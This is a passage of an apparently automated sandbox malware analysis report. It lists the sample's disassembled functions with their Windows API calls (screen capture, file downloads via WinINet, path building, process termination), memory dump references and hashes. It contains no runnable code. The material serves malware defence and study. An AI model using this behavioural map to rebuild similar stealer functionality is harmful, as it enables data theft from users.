                          • Opcode Fuzzy Hash: d8a4b448b3cbd2fec1d6e41789f4e9dc9c9ba109b5cf32146fe5b58423eccd26
                          • Instruction Fuzzy Hash: C5518070A012299BDB11DFA5DD84A9FB7FAAF94300F40513AE505E33A1DB74AE058F98
                          Function 0041EFB0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 164stringmemoryCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041EFE4
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041F012
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0041F026
                          • lstrlen.KERNEL32(00000000), ref: 0041F035
                          • LocalAlloc.KERNEL32(00000040,00000001), ref: 0041F053
                          • StrStrA.SHLWAPI(00000000,?), ref: 0041F081
                          • lstrlen.KERNEL32(?), ref: 0041F094
                          • lstrlen.KERNEL32(00000000), ref: 0041F0B2
                          • lstrcpy.KERNEL32(00000000,ERROR), ref: 0041F0FF
                          • lstrcpy.KERNEL32(00000000,ERROR), ref: 0041F13F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$AllocLocal
                          • String ID: ERROR
                          • API String ID: 1803462166-2861137601
                          • Opcode ID: 1254e741c4c66394e964bd9e4527e280da5e45af26195386c32257c4f856ff08
                          • Instruction ID: e22b173a79ada993f9a8a1c07171ccda291608974229222064182065bbebafd3
                          • Opcode Fuzzy Hash: 1254e741c4c66394e964bd9e4527e280da5e45af26195386c32257c4f856ff08
                          • Instruction Fuzzy Hash: F951A031A102019FCB21AF79DC49AAB77A5AF44304F04517EF849AB392DB78DC468B98
                          Function 0040A010 Relevance: 18.3, APIs: 12, Instructions: 251stringlibraryCOMMON
                          Download Yara Rule
                          APIs
                          • GetEnvironmentVariableA.KERNEL32(00FB8970,00639BD8,0000FFFF), ref: 0040A026
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0040A053
                          • lstrlen.KERNEL32(00639BD8), ref: 0040A060
                          • lstrcpy.KERNEL32(00000000,00639BD8), ref: 0040A08A
                          • lstrlen.KERNEL32(00434C4C), ref: 0040A095
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040A0B2
                          • lstrcat.KERNEL32(00000000,00434C4C), ref: 0040A0BE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040A0E4
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0040A0EF
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040A114
                          • SetEnvironmentVariableA.KERNEL32(00FB8970,00000000), ref: 0040A12F
                          • LoadLibraryA.KERNEL32(00FBD6E8), ref: 0040A143
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                          • String ID:
                          • API String ID: 2929475105-0
                          • Opcode ID: 82ba748268051fe5188cce3ae7938c6ffc81754323684e600c663be949974750
                          • Instruction ID: 7d912217e2c1cdd1b5579b186059a9d855d1cfaca40abc7576ab747b41788514
                          • Opcode Fuzzy Hash: 82ba748268051fe5188cce3ae7938c6ffc81754323684e600c663be949974750
                          • Instruction Fuzzy Hash: 7D9190306007009FD7319FA4DC88AA736A6AB94705F50507AF805AB3E2EFBDDD508BD6
                          Function 0041C840 Relevance: 18.2, APIs: 12, Instructions: 209stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0041C8A2
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0041C8D1
                          • lstrlen.KERNEL32(00000000), ref: 0041C8FC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041C932
                          • StrCmpCA.SHLWAPI(00000000,00434C3C), ref: 0041C943
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID:
                          • API String ID: 367037083-0
                          • Opcode ID: 22e2815f99eb4bebc5cbde40df01183566fb2abad0536647897f89be00fadbf9
                          • Instruction ID: 99e82f24fe39c89555339a76d2e1fc7fd259bc8c0b3e81e4d7877e8eb3653008
                          • Opcode Fuzzy Hash: 22e2815f99eb4bebc5cbde40df01183566fb2abad0536647897f89be00fadbf9
                          • Instruction Fuzzy Hash: FC61B171E902199BDB11EFB58DC8BEF7BB9AF05740F10002AE841E7381D77889458BE9
                          Function 004241E0 Relevance: 16.7, APIs: 11, Instructions: 177COMMON
                          Download Yara Rule
                          APIs
                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00420CF0), ref: 00424276
                          • GetDesktopWindow.USER32 ref: 00424280
                          • GetWindowRect.USER32(00000000,?), ref: 0042428D
                          • SelectObject.GDI32(00000000,00000000), ref: 004242BF
                          • GetHGlobalFromStream.COMBASE(00420CF0,?), ref: 00424336
                          • GlobalLock.KERNEL32(?), ref: 00424340
                          • GlobalSize.KERNEL32(?), ref: 0042434D
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                          • String ID:
                          • API String ID: 1264946473-0
                          • Opcode ID: 4df049b90167f18abc31d218c70bb12806ecc89bd0e67f63d31103b3401f95cd
                          • Instruction ID: eb4780d50b61bbb4fe54e0ab5ed906a0b4982877679e062fe34ca6faa184e236
                          • Opcode Fuzzy Hash: 4df049b90167f18abc31d218c70bb12806ecc89bd0e67f63d31103b3401f95cd
                          • Instruction Fuzzy Hash: 72512E75A10208AFDB10DFA5ED89AEEB7B9EF48304F10541AF905E3290DB74AD05CFA4
                          Function 0041DFA0 Relevance: 16.7, APIs: 11, Instructions: 175stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcat.KERNEL32(?,00FBE020), ref: 0041E00D
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0041E037
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041E06F
                          • lstrcat.KERNEL32(?,00000000), ref: 0041E07D
                          • lstrcat.KERNEL32(?,?), ref: 0041E098
                          • lstrcat.KERNEL32(?,?), ref: 0041E0AC
                          • lstrcat.KERNEL32(?,00FAB338), ref: 0041E0C0
                          • lstrcat.KERNEL32(?,?), ref: 0041E0D4
                          • lstrcat.KERNEL32(?,00FBD588), ref: 0041E0E7
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041E11F
                          • GetFileAttributesA.KERNEL32(00000000), ref: 0041E126
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                          • String ID:
                          • API String ID: 4230089145-0
                          • Opcode ID: ad19b1581edb05993551cdc68ca35f4d831bd1402a2252a48962e02a2718f3cf
                          • Instruction ID: cc61a0fd2022bd44df843706e61332b767ad8f1904ff0946a220dc2a2cd5f11a
                          • Opcode Fuzzy Hash: ad19b1581edb05993551cdc68ca35f4d831bd1402a2252a48962e02a2718f3cf
                          • Instruction Fuzzy Hash: 58617075A1011CABCB55DB64CD48ADE77B5BF48300F1049AAFA0AA3290DFB49F858F94
                          Function 00406AD0 Relevance: 16.6, APIs: 11, Instructions: 127networkfilestringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 00406AFF
                          • InternetOpenA.WININET(0042CFEC,00000001,00000000,00000000,00000000), ref: 00406B2C
                          • StrCmpCA.SHLWAPI(?,00FBE538), ref: 00406B4A
                          • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 00406B6A
                          • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00406B88
                          • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00406BA1
                          • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00406BC6
                          • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00406BF0
                          • CloseHandle.KERNEL32(00000000), ref: 00406C10
                          • InternetCloseHandle.WININET(00000000), ref: 00406C17
                          • InternetCloseHandle.WININET(?), ref: 00406C21
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                          • String ID:
                          • API String ID: 2500263513-0
                          • Opcode ID: 917f675ddc84d86bb4b15c12f684a95ab0bafc993a086ba79af1a324fa0f715f
                          • Instruction ID: c5ad55131c4ce7db38fffddb58cb683fbd38acd074282c5770988a30aae92a0f
                          • Opcode Fuzzy Hash: 917f675ddc84d86bb4b15c12f684a95ab0bafc993a086ba79af1a324fa0f715f
                          • Instruction Fuzzy Hash: 734171B1600215ABDB24DF64DC89FAE77B9EB44704F004469FA06E72C0DF74AE448BA8
                          Function 00424500 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 95memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,00414F39), ref: 00424545
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0042454C
                          • wsprintfW.USER32 ref: 0042455B
                          • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 004245CA
                          • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 004245D9
                          • CloseHandle.KERNEL32(00000000,?,?), ref: 004245E0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$Heap$AllocateCloseHandleOpenTerminatewsprintf
                          • String ID: 9OA$%hs$9OA
                          • API String ID: 885711575-2887891451
                          • Opcode ID: c6061c17c14f2bf59568cb40a23737b7e44df780ea9a98ad1f2c030f43cf0d92
                          • Instruction ID: 346fc250c6ad360f339df3eea786a7fcde9f53112dcb33079fd12cc933be49ee
                          • Opcode Fuzzy Hash: c6061c17c14f2bf59568cb40a23737b7e44df780ea9a98ad1f2c030f43cf0d92
                          • Instruction Fuzzy Hash: 49313E72B00215BBDB10DBA4EC89FDE7779EF45740F10405AFA05E7180DBB4AA458BA9
                          Function 0040BBF9 Relevance: 15.2, APIs: 12, Instructions: 249stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0040BC1F
                          • lstrlen.KERNEL32(00000000), ref: 0040BC52
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040BC7C
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0040BC84
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040BCAC
                          • lstrlen.KERNEL32(00434AD4), ref: 0040BD23
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat
                          • String ID:
                          • API String ID: 2500673778-0
                          • Opcode ID: 8c7ae8d9145d9521553447a705b0b53fd086f1c9fe675d944289f12c0e91ea3f
                          • Instruction ID: 37072dd1b280c51efd76c48aba3edd40c61a6322b10c9e257032049fce7c4c6e
                          • Opcode Fuzzy Hash: 8c7ae8d9145d9521553447a705b0b53fd086f1c9fe675d944289f12c0e91ea3f
                          • Instruction Fuzzy Hash: 5AA13D30A012058FDB25DF69D949A9AB7B1EF44308F14907EE806A73E1DB79DC45CF98
                          Function 00425EE0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 215COMMON
                          Download Yara Rule
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00425F2A
                          • std::_Xinvalid_argument.LIBCPMT ref: 00425F49
                          • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 00426014
                          • memmove.MSVCRT(00000000,00000000,?), ref: 0042609F
                          • std::_Xinvalid_argument.LIBCPMT ref: 004260D0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Xinvalid_argumentstd::_$memmove
                          • String ID: invalid string position$string too long
                          • API String ID: 1975243496-4289949731
                          • Opcode ID: 248e388eb9716987a64bfdae4f7488f922a15a70e7c441f4d4e5e693b8a5128c
                          • Instruction ID: 23f54f40cff19bc4bb9c49db95a2febe0b18c2065056c6ff7ff83454884ea771
                          • Opcode Fuzzy Hash: 248e388eb9716987a64bfdae4f7488f922a15a70e7c441f4d4e5e693b8a5128c
                          • Instruction Fuzzy Hash: B261C030700520DBDB28CF5CEAC096EB3B6EF85304BA5495AE582C7381C734ED819B9D
                          Function 0041E049 Relevance: 13.6, APIs: 9, Instructions: 124stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041E06F
                          • lstrcat.KERNEL32(?,00000000), ref: 0041E07D
